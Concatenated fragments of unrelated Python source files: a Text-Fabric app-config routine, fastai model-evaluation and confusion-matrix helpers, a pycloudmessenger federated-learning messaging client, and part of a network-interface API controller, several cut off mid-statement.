mergeDictOfSets(
childType,
{
nType: {structureTypes[i + 1]}
for (i, nType) in enumerate(structureTypes)
if i < len(structureTypes) - 1
},
)
mergeDictOfSets(
childType,
{
nType: {sectionTypes[i + 1]}
for (i, nType) in enumerate(sectionTypes)
if i < len(sectionTypes) - 1
},
)
# here we override from the chlidren information in the app-config
for (nType, childInfo) in children.items():
childType[nType] = childInfo
lowestSectionalTypes = set() | verseTypes
if sectionTypes:
lowestSectionalTypes.add(sectionTypes[-1])
if structureTypes:
lowestSectionalTypes.add(structureTypes[-1])
biggestOtherType = slotType
for rt in remainingTypes:
if verseRank is None or otypeRank[rt] < verseRank:
biggestOtherType = rt
break
smallestOtherType = remainingTypes[-1] if remainingTypes else None
for lexType in lexTypes:
if lexType in childType:
del childType[lexType]
for lowestSectionalType in lowestSectionalTypes:
if lowestSectionalType not in childType:
childType[lowestSectionalType] = {biggestOtherType}
else:
childType[lowestSectionalType].add(biggestOtherType)
if smallestOtherType is not None and smallestOtherType != slotType:
if smallestOtherType not in childType:
childType[smallestOtherType] = {slotType}
else:
childType[smallestOtherType].add(slotType)
if condenseType is None:
condenseType = sectionTypes[-1] if sectionTypes else midType
for (i, nTypes) in enumerate(levelTypes):
for nType in nTypes:
levels[nType] = getLevel(i, givenLevels.get(nType, {}), nType in verseTypes)
levelCls = {}
for (nType, nTypeInfo) in levels.items():
level = nTypeInfo["level"]
flow = nTypeInfo["flow"]
wrap = nTypeInfo["wrap"]
containerCls = f"contnr c{level}"
labelCls = f"lbl c{level}"
childrenCls = (
f"children {flow} {'wrap' if wrap else ''}"
if childType.get(nType, None)
else ""
)
levelCls[nType] = dict(
container=containerCls, label=labelCls, children=childrenCls,
)
descendantType = transitiveClosure(childType, {slotType})
specs.update(
baseTypes=baseTypes if baseTypes else {slotType},
bigTypes=bigTypes,
childType=childType,
condenseType=condenseType,
descendantType=descendantType,
exclusions=exclusions,
features=features,
featuresBare=featuresBare,
hasGraphics=hasGraphics,
hiddenTypes=hiddenTypes,
labels=labels,
levels=levels,
levelCls=levelCls,
lexMap=lexMap,
lexTypes=lexTypes,
lineNumberFeature=lineNumberFeature,
noDescendTypes=lexTypes,
styles=styles,
templates=templates,
verseTypes=verseTypes,
)
def showContext(app, *keys):
"""Shows the *context* of the app `tf.advanced.app.App.context` in a pretty way.
The context is the result of computing sensible defaults for the corpus
combined with configuration settings in the app's `config.yaml`.
Parameters
----------
keys: iterable of string
For each key passed to this function, the information for that key
will be displayed. If no keys are passed, all keys will be displayed.
Returns
-------
displayed HTML
An expandable list of the key-value pair for the requested keys.
See Also
--------
tf.advanced.app.App.reuse
tf.advanced.settings: options allowed in `config.yaml`
"""
showDict(f"<b>{(app.appName)}</b> <i>app context</i>", app.specs, *keys)
def getLevel(defaultLevel, givenInfo, isVerse):
level = givenInfo.get("level", defaultLevel)
| |
import numpy as np
from fastai.basic_train import Recorder
from fastai.core import ifnone, defaults, Any
from fastai.torch_core import to_np
from fastai.vision import *
import matplotlib.pyplot as plt
from typing import Optional
import scipy
import itertools
def model_cutter(model, select=[]):
cut = select[0]
ll = list(model.children())
if len(select) == 1:
if cut == 0 and isinstance(ll[0], torch.nn.modules.container.Sequential):
return ll[0]
else:
return nn.Sequential(*ll[:cut+1])
else:
if cut == 0:
return model_cutter(ll[0], select=select[1:])
else:
new_ll = ll[:cut] + [model_cutter(ll[cut], select=select[1:])]
return nn.Sequential(*new_ll)
def silent_validate(model:nn.Module, dl:DataLoader, loss_func:OptLossFunc=None, cb_handler:Optional[CallbackHandler]=None,
average=True, n_batch:Optional[int]=None)->Iterator[Tuple[Union[Tensor,int],...]]:
"""Calculate `loss_func` of `model` on `dl` in evaluation mode.
Note: This version does not overwrite results from training"""
model.eval()
with torch.no_grad():
val_losses,nums = [],[]
if cb_handler: cb_handler.set_dl(dl)
for xb,yb in dl:
if cb_handler: xb, yb = cb_handler.on_batch_begin(xb, yb, train=False)
val_loss = loss_batch(model, xb, yb, loss_func, cb_handler=cb_handler)
val_losses.append(val_loss)
if not is_listy(yb): yb = [yb]
nums.append(first_el(yb).shape[0])
if cb_handler and cb_handler.on_batch_end(val_losses[-1]): break
if n_batch and (len(nums)>=n_batch): break
nums = np.array(nums, dtype=np.float32)
if average: return (to_np(torch.stack(val_losses)) * nums).sum() / nums.sum()
else: return val_losses
def _svalidate(self, dl=None, callbacks=None, metrics=None):
"Validate on `dl` with potential `callbacks` and `metrics`."
dl = ifnone(dl, self.data.valid_dl)
metrics = ifnone(metrics, self.metrics)
cb_handler = CallbackHandler(self.callbacks + ifnone(callbacks, []), metrics)
cb_handler.on_train_begin(1, None, metrics); cb_handler.on_epoch_begin()
val_metrics = silent_validate(self.model, dl, self.loss_func, cb_handler)
cb_handler.on_epoch_end(val_metrics)
return cb_handler.state_dict['last_metrics']
Learner.svalidate = _svalidate
def get_val_stats(learner):
rec = learner.recorder
ret = {'loss':float(rec.val_losses[-1])}
for i, name in enumerate(rec.metrics_names):
ret[name] = float(rec.metrics[-1][i])
return ret
def get_best_stats(learner):
rec = learner.recorder
keys = ['loss'] + rec.metrics_names
results = []
for i, loss in enumerate(rec.val_losses):
entry = [loss] + [float(v) for v in rec.metrics[i]]
results.append(dict(zip(keys, entry)))
return sorted(results, key=lambda x:x['error_rate'])[0]
def my_smooth(sig, w=2):
sig_p = np.pad(sig, (w,w), 'edge')
return np.array([np.mean(sig_p[i:i+2*w+1]) for i in range(len(sig_p)-2*w)])
def plot2(self, skip_start:int=10, skip_end:int=5, suggestion:bool=True, return_fig:bool=None, win=3,
**kwargs)->Optional[plt.Figure]:
"Plot learning rate and losses, trimmed between `skip_start` and `skip_end`. Optionally plot and return min gradient"
lrs = self._split_list(self.lrs, skip_start, skip_end)
losses = self._split_list(self.losses, skip_start, skip_end)
losses = [x.item() for x in losses]
all_losses = [losses]
#if 'k' in kwargs: losses = self.smoothen_by_spline(lrs, losses, **kwargs)
fig, ax = plt.subplots(1,1)
ax.plot(lrs, losses)
if win is not None:
losses2 = my_smooth(losses, w=win)
all_losses.append(losses2)
ax.plot(lrs, losses2, 'g', lw=0.5)
ax.set_ylabel("Loss")
ax.set_xlabel("Learning Rate")
ax.set_xscale('log')
ax.xaxis.set_major_formatter(plt.FormatStrFormatter('%.0e'))
if suggestion:
for i, l in enumerate(all_losses):
tag = '' if i == 0 else ' (smoothed)'
try: mg = (np.gradient(np.array(l))).argmin()
except:
print(f"Failed to compute the gradients{tag}, there might not be enough points.")
return
print(f"Min numerical gradient: {lrs[mg]:.2E} {tag}")
color = 'r' if i == 0 else 'g'
ax.plot(lrs[mg],losses[mg],markersize=10,marker='o',color=color)
if i == 0:
self.min_grad_lr = lrs[mg]
ml = np.argmin(l)
ax.plot(lrs[ml],losses[ml],markersize=8,marker='o',color='k')
print(f"Min loss divided by 10: {lrs[ml]/10:.2E}")
ax.plot([lrs[ml]/10, lrs[ml]/10], [np.min(l), np.max(l)], 'k--', alpha=0.5)
#print(np.min(l), np.max(l))
elif i == 1:
self.min_grad_lr_smoothed = lrs[mg]
if ifnone(return_fig, defaults.return_fig): return fig
try:
if not IN_NOTEBOOK: plot_sixel(fig)
except: pass
Recorder.plot2 = plot2
def threshold_confusion_matrix(interp, thresh=0):
preds = to_np(interp.preds)
y_true = to_np(interp.y_true)
n = preds.shape[1]
cm = np.zeros((n,n), dtype=np.int64)
for j, p in enumerate(preds):
i = np.argmax(p)
y = y_true[j]
if p[i] >= thresh:
cm[y, i] += 1
return cm
# fixed version -- consider submitting PR
def plot_confusion_matrix_thresh(self, normalize:bool=False, title:str='Confusion matrix', cmap:Any="Blues", slice_size:int=1,
thresh:float=0.0,
norm_dec:int=2, plot_txt:bool=True, return_fig:bool=None, **kwargs)->Optional[plt.Figure]:
"Plot the confusion matrix, with `title` and using `cmap`."
# This function is mainly copied from the sklearn docs
if thresh == 0:
cm = self.confusion_matrix(slice_size=slice_size)
else:
cm = threshold_confusion_matrix(self, thresh=thresh)
if normalize: cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
fig = plt.figure(**kwargs)
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
tick_marks = np.arange(self.data.c)
plt.xticks(tick_marks, self.data.y.classes, rotation=90)
plt.yticks(tick_marks, self.data.y.classes, rotation=0)
if plot_txt:
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
coeff = f'{cm[i, j]:.{norm_dec}f}' if normalize else f'{cm[i, j]}'
plt.text(j, i, coeff, horizontalalignment="center", verticalalignment="center", color="white" if cm[i, j] > thresh else "black")
plt.ylim(-0.5, self.data.c-0.5)
plt.tight_layout()
plt.ylabel('Actual')
plt.xlabel('Predicted')
plt.grid(False)
if ifnone(return_fig, defaults.return_fig): return fig
# work-around version
def plot_confusion_matrix(interp, *args, **kwargs):
interp.plot_confusion_matrix(*args, **kwargs)
plt.ylim(-0.5, interp.data.c-0.5)
def _summarize_cm(cm, classes):
n = len(classes)
print(f'{" "*10} Precision')
print(f'{" "*10} Specificity Recall Sensitivity F1')
total = np.sum(cm)
for i, c in enumerate(classes):
predicted = np.sum(cm[:, i])
actual = np.sum(cm[i, :])
TP = cm[i,i]
FP = predicted - TP
TN = total - actual - predicted + TP
all_actual_neg = total - actual
precision = TP/predicted
recall = TP/actual
sensitivity = TN/all_actual_neg
F1 = scipy.stats.hmean([precision, recall])
print(f'{c:10} {" "*3} {100*precision:3.0f}% {" "*6} {100*recall:3.0f}% {" "*6}' +
f'{100*sensitivity:3.0f}% {" "*6} {F1:3.2f}')
def _consolidate_cm(cm, groupings, class_map):
"""consolidate confusion matrix by combining class groups"""
# Group anong first axis
cons = []
for group, members in groupings.items():
members = members if isinstance(members, (list, tuple)) else [members]
cons.append(np.sum([cm[class_map[m],:] for m in members], axis=0))
cons = np.stack(cons)
# group along second axis
grouped_cm = []
for group, members in groupings.items():
members = members if isinstance(members, (list, tuple)) else [members]
grouped_cm.append(np.sum([cons[:,class_map[m]] for m in members], axis=0))
grouped_cm = np.stack(grouped_cm).T
return grouped_cm
def interpretation_summary(interp, groupings=None, strict=False, thresh:float=0.0):
if thresh == 0:
cm = interp.confusion_matrix()
else:
cm = threshold_confusion_matrix(interp, thresh=thresh)
_summarize_cm(cm, interp.data.classes)
if isinstance(groupings, dict):
class_map = {c:i for i, c in enumerate(interp.data.classes)}
grouped_cm = _consolidate_cm(cm, groupings, class_map)
print('\nSummary by group')
_summarize_cm(grouped_cm, list(groupings.keys()))
print('\n')
_get_accuracy(cm)
def _get_accuracy(cm, do_print=True):
total = np.sum(cm)
TP = np.sum([cm[i,i] for i in range(len(cm))])
acc = float(TP)/total
if do_print:
print(f'Overall Accuracy: {acc*100:3.2f}%')
else:
return acc
def get_accuracy(interp, do_print=True):
cm = interp.confusion_matrix()
_get_accuracy(cm, do_print=do_print)
def analyze_confidence(interp, thresh = 0.0, do_plot=True, plot_args={'figsize':(10, 5)}, return_raw=False):
p = to_np(interp.preds)
y_true = to_np(interp.y_true)
all_correct = [p[j, i] for j in range(len(y_true)) for i in [np.argmax(p[j])]
if i ==y_true[j] and p[j, i] > thresh]
all_wrong = [p[j, i] for j in range(len(y_true)) for i in [np.argmax(p[j])]
if i !=y_true[j] and p[j, i] > thresh]
total_predicted = len(all_correct) + len(all_wrong)
acc = len(all_correct) / total_predicted
missing = len(y_true) - total_predicted
pct_unknown = missing / len(y_true)
if do_plot and not return_raw:
print(f'Accuracy: {100*acc:3.2f}% Error: {100*(1-acc):3.2f}% Unknown: {100*pct_unknown:3.2f}% @ Threshold: {thresh:0.2f}')
print('')
colors = ['green', 'red']
print(f'Confidence Histograms @ t={thresh}')
fig, axs = plt.subplots(2, 2, **plot_args)
ax = axs[0, 0]
ax.tick_params(axis='both', which='major', labelsize=7)
ax.set_title(f'Correct & Incorrect')
ax.hist([all_correct, all_wrong], range=(0,1), bins=20, stacked=True, color=colors)
ax.set_xlim(thresh, 1)
ax = axs[0, 1]
ax.tick_params(axis='both', which='major', labelsize=7)
ax.set_title(f'Incorrect Only')
ax.hist(all_wrong, range=(0,1), bins=20, color=colors[1])
ax.set_xlim(thresh, 1)
ax = axs[1, 0]
ax.tick_params(axis='both', which='major', labelsize=7)
ax.set_title(f'Log Correct & Incorrect')
ax.hist([all_correct, all_wrong], range=(0,1), bins=20, log=True, stacked=True, color=colors)
ax.set_xlim(thresh, 1)
ax = axs[1, 1]
ax.tick_params(axis='both', which='major', labelsize=7)
ax.set_title(f'Log Incorrect Only')
ax.hist(all_wrong, range=(0,1), bins=20, log=True, color=colors[1])
ax.set_xlim(thresh, 1)
fig.tight_layout()
plt.show()
elif return_raw:
return total_predicted, len(all_correct), len(all_wrong), missing
else:
return acc, pct_unknown
def accuracy_vs_threshold(interp, threshold_range=(0, 0.90, 18), plot_args={'figsize':(8, 2)}):
t_range = np.linspace(*threshold_range)
results = np.array([analyze_confidence(interp, thresh=t, do_plot=False) for t in t_range])
fig, axs = plt.subplots(1, 2, **plot_args)
ax = axs[0]
ax.set_title('Error Rate vs Threshold')
ax.plot(t_range, 1 - results[:, 0])
ax.minorticks_on()
ax.grid(which='major', linestyle='-', linewidth='0.5', color='red')
ax.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
ax = axs[1]
ax.set_title('Witheld Predictions vs Threshold')
ax.plot(t_range, results[:, 1])
ax.minorticks_on()
ax.grid(which='major', linestyle='-', linewidth='0.5', color='red')
ax.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
fig.tight_layout()
plt.show()
def show_incremental_accuracy(interp, plot_args={'figsize':(8,3)}):
all_thresholds = np.linspace(0, 0.99, 25)
results = np.array([analyze_confidence(interp, thresh=t, return_raw=True) for t in all_thresholds])
all_predicted, all_correct, all_wrong,all_missing = results[:, 0], results[:, 1], results[:, 2], results[:, 3],
d_predicted, d_correct, d_wrong, d_missing = -np.diff(results[:, 0]), -np.diff(results[:, 1]), -np.diff(results[:, 2]), np.diff(results[:, 3])
fig, axs = plt.subplots(1, 2, **plot_args)
ax = axs[0]
ax.set_title('Incremental Accuracy vs Threshold')
ax.scatter([np.mean(all_thresholds[i:i+1]) for i, p in enumerate(d_predicted) if p >= 10],
[d_correct[i]/p for i, p in enumerate(d_predicted) if p >= 10], s=10)
ax.set_xlim(0, 1)
ax.set_ylim(0, 1)
ax.set_xlabel('Threshold')
ax.set_ylabel('Incremental Accuracy')
ax = axs[1]
ax.set_title('Total Predicted vs Threshold')
ax.plot([all_thresholds[i] for i, p in enumerate(all_predicted)],
[p/all_predicted[0] for i, p in enumerate(all_predicted)])
ax.set_xlim(0, 1)
ax.set_ylim(0, 1)
ax.set_xlabel('Threshold')
ax.set_ylabel('Predicted')
fig.tight_layout()
plt.show()
def old_analyze_low_confidence(interp, thresh=0.0, thresh_min=0.0, display_mode='delta'):
assert display_mode in ['delta', 'index', 'prediction']
p = to_np(interp.preds)
y_true = to_np(interp.y_true)
wrong = [(j,p[j, i], p[j, y_true[j]], p[j, i]-p[j, y_true[j]] ) for j in range(len(y_true)) for i in [np.argmax(p[j])]
if i !=y_true[j] and p[j, i] < thresh and p[j, i] >= thresh_min]
med_delta = np.median([w[3] for w in wrong])
print(f'Total predictions in range: {len(wrong)} Median delta: {med_delta:3.2f}')
if display_mode == 'index':
print('\nLow Confidence Predictions sorted by image number')
elif display_mode | |
<filename>pycloudmessenger/ffl/fflapi.py<gh_stars>0
#!/usr/bin/env python3
#author <EMAIL>
"""FFL protocol handler.
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
Please note that the following code was developed for the project MUSKETEER
in DRL funded by the European Union under the Horizon 2020 Program.
"""
# pylint: disable=R0903, R0913
import json
import logging
from enum import Enum
import requests
import pycloudmessenger.utils as utils
import pycloudmessenger.rabbitmq as rabbitmq
import pycloudmessenger.serializer as serializer
import pycloudmessenger.ffl.message_catalog as catalog
logging.getLogger("pika").setLevel(logging.WARNING)
class Topology(str, Enum):
'''FFL task topologies'''
star = "STAR"
def __str__(self):
return self.value
class Notification(str, Enum):
'''Notifications that can be received'''
aggregator_started = 'aggregator_started'
aggregator_stopped = 'aggregator_stopped'
participant_joined = 'participant_joined'
participant_updated = 'participant_updated'
participant_left = 'participant_left'
@classmethod
def is_notification(cls, msg: dict, notification) -> bool:
'''is_notification
check if msg is a particular notification
returns :True if yes, False otherwise
'''
try:
ntype = msg['notification']['type']
return cls(ntype) is notification
except:
# not a notification
pass
return False
@classmethod
def is_aggregator_started(cls, msg: dict) -> bool:
'''is_aggregator_started
returns: True, if msg is an aggregator started notification, False otherwise
'''
return cls.is_notification(msg, cls.aggregator_started)
@classmethod
def is_aggregator_stopped(cls, msg: dict) -> bool:
'''is_aggregator_stopped
returns: True, if msg is an aggregator stopped notification, False otherwise
'''
return cls.is_notification(msg, cls.aggregator_stopped)
@classmethod
def is_participant_joined(cls, msg: dict) -> bool:
'''is_participant_joined
returns: True, if msg is a participant joined notification, False otherwise
'''
return cls.is_notification(msg, cls.participant_joined)
@classmethod
def is_participant_left(cls, msg: dict) -> bool:
'''is_participant_left
returns: True, if msg is a participant left notification, False otherwise
'''
return cls.is_notification(msg, cls.participant_left)
@classmethod
def is_participant_updated(cls, msg: dict) -> bool:
'''is_participant_updated
returns: True, if msg is a participant updated notification, False otherwise
'''
return cls.is_notification(msg, cls.participant_updated)
def __str__(self):
return self.value
class Context(rabbitmq.RabbitContext):
'''Holds connection details for an FFL service'''
class TimedOutException(rabbitmq.RabbitTimedOutException):
'''Over-ride exception'''
class ConsumerException(rabbitmq.RabbitConsumerException):
'''Over-ride exception'''
class Messenger(rabbitmq.RabbitDualClient):
'''Communicates with an FFL service'''
def __init__(self, context: Context, publish_queue: str = None,
subscribe_queue: str = None, max_msg_size: int = 2*1024*1024):
'''Class initializer'''
super(Messenger, self).__init__(context)
#Max size of a message for dispatch
self.max_msg_size = max_msg_size
#Keep a copy here - lots of re-use
self.timeout = context.timeout()
if not publish_queue:
#Publish not over-ridden so use context version
publish_queue = context.feeds()
self.start_subscriber(queue=rabbitmq.RabbitQueue(subscribe_queue))
self.start_publisher(queue=rabbitmq.RabbitQueue(publish_queue))
#Initialise the catalog with the target subscribe queue
self.catalog = catalog.MessageCatalog(context.user(), self.get_subscribe_queue())
def __enter__(self):
return self
def __exit__(self, *args):
self.stop()
def _send(self, message: dict, queue: str = None) -> dict:
'''
Send a message and return immediately
Throws: An exception on failure
Returns: dict
'''
message = serializer.Serializer.serialize(message)
if len(message) > self.max_msg_size:
raise BufferError(f"Messenger: payload too large: {len(message)}.")
pub_queue = rabbitmq.RabbitQueue(queue) if queue else None
super(Messenger, self).send_message(message, pub_queue)
def receive(self, timeout: int = 0) -> dict:
'''
Wait for timeout seconds for a message to arrive
Throws: An exception on failure
Returns: dict
'''
if not timeout:
timeout = self.timeout
try:
super(Messenger, self).receive_message(self.internal_handler, timeout, 1)
except rabbitmq.RabbitTimedOutException as exc:
raise TimedOutException(exc) from exc
except rabbitmq.RabbitConsumerException as exc:
raise ConsumerException(exc) from exc
return serializer.Serializer.deserialize(self.last_recv_msg)
def _invoke_service(self, message: dict, timeout: int = 0) -> dict:
'''
Send a message and wait for a reply
Throws: An exception on failure
Returns: dict
'''
result = None
if not timeout:
timeout = self.timeout
try:
message = serializer.Serializer.serialize(message)
if len(message) > self.max_msg_size:
raise BufferError(f"Messenger: payload too large: {len(message)}.")
result = super(Messenger, self).invoke_service(message, timeout)
except rabbitmq.RabbitTimedOutException as exc:
raise TimedOutException(exc) from exc
except rabbitmq.RabbitConsumerException as exc:
raise ConsumerException(exc) from exc
if not result:
raise Exception(f"Malformed object: None")
result = serializer.Serializer.deserialize(result)
if 'error' in result:
raise Exception(result['error'])
if 'calls' not in result:
raise Exception(f"Malformed object: {result}")
results = result['calls'][0]['count'] #calls[0] will always succeed
return result['calls'][0]['data'] if results else None
def _dispatch_model(self, model: dict = None) -> dict:
'''
Dispatch a model and determine its download location
Throws: An exception on failure
Returns: dict
'''
if not model:
return {}
#First, obtain the upload location/keys
message = self.catalog.msg_bin_uploader()
upload_info = self._invoke_service(message)
#And then perform the upload
response = requests.post(
upload_info['url'],
files={'file': json.dumps(model)},
data=upload_info['fields'],
headers=None)
if not response.ok:
raise Exception(f'Upload Error: {response.status_code}')
if 'key' not in upload_info['fields']:
raise Exception('Malformed URL.')
#Now obtain the download location/keys
message = self.catalog.msg_bin_downloader(upload_info['fields']['key'])
download_info = self._invoke_service(message)
return {'url': download_info}
######## Public methods
def user_create(self, user_name: str, password: str, organisation: str) -> dict:
'''
Register as a new user on the platformr
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_user_create(user_name, password, organisation)
return self._invoke_service(message)
def user_assignments(self) -> dict:
'''
Return all tasks joined by the current user
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_user_assignments()
return self._invoke_service(message)
def task_assignment_info(self, task_name: str) -> dict:
'''
As a task participant, get my participation details
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_assignment_info(task_name)
message = self._invoke_service(message)
return message[0]
def task_assignment_join(self, task_name: str) -> dict:
'''
As a potential task participant, try to join the task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_join(task_name)
message = self._invoke_service(message)
return message[0]
def task_assignment_update(self, task_name: str, model: dict = None) -> None:
'''
Sends an update, including a model dict, no reply wanted
Throws: An exception on failure
Returns: Nothing
'''
model_message = self._dispatch_model(model)
message = self.catalog.msg_task_assignment_update(
task_name, model=model_message)
self._send(message)
def task_assignment_wait(self, timeout: int = 0) -> dict:
'''
Wait for a message, until timeout seconds
Throws: An exception on failure
Returns: dict
'''
return self.receive(timeout)
def task_assignments(self, task_name: str) -> dict:
'''
Return all assignments for the owned task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_assignments(task_name)
return self._invoke_service(message)
def task_listing(self) -> dict:
'''
Return a list of all tasks available
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_listing()
return self._invoke_service(message)
def task_create(self, task_name: str, topology: str, definition: dict) -> dict:
'''
A new task created by the current user
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_create(task_name, topology, definition)
message = self._invoke_service(message)
return message[0]
def task_update(self, task_name: str, status: str, topology: str = None,
definition: dict = None) -> dict:
'''
Change task details
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_update(task_name, topology, definition, status)
return self._invoke_service(message)
def task_info(self, task_name: str) -> dict:
'''
Return info on a task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_info(task_name)
message = self._invoke_service(message)
return message[0]
def task_quit(self, task_name: str) -> dict:
'''
As a task participant, leave the task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_quit(task_name)
return self._invoke_service(message)
def task_start(self, task_name: str, model: dict = None) -> None:
'''
As a task owner, start the task
Throws: An exception on failure
Returns: Nothing
'''
model_message = self._dispatch_model(model)
message = self.catalog.msg_task_start(task_name, model_message)
self._send(message)
def task_stop(self, task_name: str) -> None:
'''
As a task owner, stop the task
Throws: An exception on failure
Returns: dict
'''
message = self.catalog.msg_task_stop(task_name)
self._send(message)
class BasicParticipant():
'''Base class for an FFL user/participant'''
def __init__(self, context: Context, task_name: str = None,
download_models: bool = True):
'''
Class initializer
Throws: An exception on failure
Returns: BasicParticipant
'''
if not context:
raise Exception('Credentials must be specified.')
self.messenger = None
#List of messages/models downloaded
self.model_files = []
self.context = context
self.task_name = task_name
self.queue = None
self.download = download_models
def __enter__(self):
'''
Context manager enters - call connect
Throws: An exception on failure
Returns: self
'''
return self.connect()
def __exit__(self, *args):
'''
Context manager exits - call close
Throws: An | |
None
for p in patch:
if '/ifclass' == p['path']:
temp_interface['ifclass'] = p['value']
elif '/sriov_numvfs' == p['path']:
sriov_numvfs = p['value']
temp_interface['sriov_numvfs'] = sriov_numvfs
elif '/sriov_vf_driver' == p['path']:
sriov_vf_driver = p['value']
temp_interface['sriov_vf_driver'] = sriov_vf_driver
# If the interface class is no longer pci-sriov, reset the VF
# parameters if they haven't been specified in the patch
if temp_interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV:
if sriov_numvfs is None:
temp_interface['sriov_numvfs'] = 0
if sriov_vf_driver is None:
temp_interface['sriov_vf_driver'] = None
sriov_update = _check_interface_sriov(temp_interface.as_dict(), ihost)
# Get the ethernet port associated with the interface if network type
# is changed
interface_ports = pecan.request.dbapi.ethernet_port_get_by_interface(
rpc_interface.uuid)
for p in interface_ports:
if p is not None:
ports = p.name
break
# Process updates
vlan_id = None
delete_addressing = False
for p in patch:
if '/vlan_id' in p['path']:
# Update vlan_id to the new value
if rpc_interface['vlan_id']:
if int(p['value']) != int(rpc_interface['vlan_id']):
vlan_id = p['value']
temp_interface['vlan_id'] = vlan_id
_check_interface_vlan_id("modify", temp_interface.as_dict(), ihost)
# replace ihost_uuid and iinterface_uuid with corresponding
patch_obj = jsonpatch.JsonPatch(patch)
for p in patch_obj:
if p['path'] == '/ihost_uuid':
p['path'] = '/forihostid'
ihost = objects.host.get_by_uuid(pecan.request.context,
p['value'])
p['value'] = ihost.id
try:
interface = Interface(**jsonpatch.apply_patch(
rpc_interface.as_dict(),
patch_obj)).as_dict()
except utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
# if the aemode is changed adjust the txhashpolicy if necessary
if interface['aemode'] == constants.AE_MODE_ACTIVE_STANDBY:
interface['txhashpolicy'] = None
if (not interface['ifclass'] or
interface['ifclass'] == constants.INTERFACE_CLASS_NONE):
# If the interface class is reset, make sure any network
# specific fields are reset as well
interface['sriov_numvfs'] = 0
interface['sriov_vf_driver'] = None
interface['ipv4_mode'] = None
interface['ipv6_mode'] = None
delete_addressing = True
else:
# Otherwise make sure that appropriate defaults are set.
interface = _set_defaults(interface)
# clear address pool values if address mode no longer set to pool
if interface['ipv4_mode'] != constants.IPV4_POOL:
interface['ipv4_pool'] = None
if interface['ipv6_mode'] != constants.IPV6_POOL:
interface['ipv6_pool'] = None
interface = _check("modify", interface,
ports=ports, ifaces=uses,
existing_interface=rpc_interface.as_dict())
# Clear the vf fields if class is not sriov
if interface['ifclass'] != constants.INTERFACE_CLASS_PCI_SRIOV:
interface["sriov_numvfs"] = 0
interface["sriov_vf_driver"] = None
if uses:
# Update MAC address if uses list changed
interface = set_interface_mac(ihost, interface)
update_upper_interface_macs(ihost, interface)
if ports:
_update_ports("modify", rpc_interface, ihost, ports)
if (not interface['ifclass'] or
interface['ifclass'] == constants.NETWORK_TYPE_NONE):
ifclass = None
else:
ifclass = interface['ifclass']
orig_ifclass = rpc_interface['ifclass']
if (not ifclass and
orig_ifclass == constants.INTERFACE_CLASS_PLATFORM):
if _is_interface_network_assigned(interface,
constants.NETWORK_TYPE_MGMT):
# Remove mgmt address associated with this interface
pecan.request.rpcapi.mgmt_ip_set_by_ihost(
pecan.request.context,
ihost['uuid'],
interface['id'],
None)
if delete_addressing:
for family in constants.IP_FAMILIES:
_delete_addressing(interface, family, rpc_interface)
else:
if _is_ipv4_address_mode_updated(interface, rpc_interface):
_update_ipv4_address_mode(interface)
if _is_ipv6_address_mode_updated(interface, rpc_interface):
_update_ipv6_address_mode(interface)
saved_interface = copy.deepcopy(rpc_interface)
try:
# Update only the fields that have changed
for field in objects.interface.fields:
if field in rpc_interface.as_dict():
if rpc_interface[field] != interface[field]:
rpc_interface[field] = interface[field]
rpc_interface.save()
# Re-read from the DB to populate extended attributes
new_interface = objects.interface.get_by_uuid(
pecan.request.context, rpc_interface.uuid)
# Update the MTU of underlying interfaces of an AE
if new_interface['iftype'] == constants.INTERFACE_TYPE_AE:
for ifname in new_interface['uses']:
_update_interface_mtu(ifname, ihost, new_interface['imtu'])
# Restore the default MTU for removed AE members
old_members = set(saved_interface['uses'])
new_members = set(new_interface['uses'])
removed_members = old_members - new_members
for ifname in removed_members:
_update_interface_mtu(ifname, ihost, DEFAULT_MTU)
if sriov_update:
pecan.request.rpcapi.update_sriov_config(
pecan.request.context,
ihost['uuid'])
return Interface.convert_with_links(new_interface)
except Exception as e:
LOG.exception(e)
msg = _("Interface update failed: host %s if %s : patch %s"
% (ihost['hostname'], interface['ifname'], patch))
raise wsme.exc.ClientSideError(msg)
@cutils.synchronized(LOCK_NAME)
@wsme_pecan.wsexpose(None, types.uuid, status_code=204)
def delete(self, interface_uuid):
"""Delete a interface."""
if self._from_ihosts:
raise exception.OperationNotPermitted
interface = objects.interface.get_by_uuid(pecan.request.context,
interface_uuid)
interface = interface.as_dict()
_delete(interface)
##############
# UTILS
##############
def _dynamic_address_allocation():
mgmt_network = pecan.request.dbapi.network_get_by_type(
constants.NETWORK_TYPE_MGMT)
return mgmt_network.dynamic
def _set_address_family_defaults_by_pool(defaults, pool_type):
pool_uuid = pecan.request.dbapi.network_get_by_type(pool_type).pool_uuid
pool = pecan.request.dbapi.address_pool_get(pool_uuid)
if pool.family == constants.IPV4_FAMILY:
defaults['ipv4_mode'] = constants.IPV4_STATIC
defaults['ipv6_mode'] = constants.IPV6_DISABLED
else:
defaults['ipv6_mode'] = constants.IPV6_STATIC
defaults['ipv4_mode'] = constants.IPV4_DISABLED
def _set_defaults(interface):
defaults = {'imtu': DEFAULT_MTU,
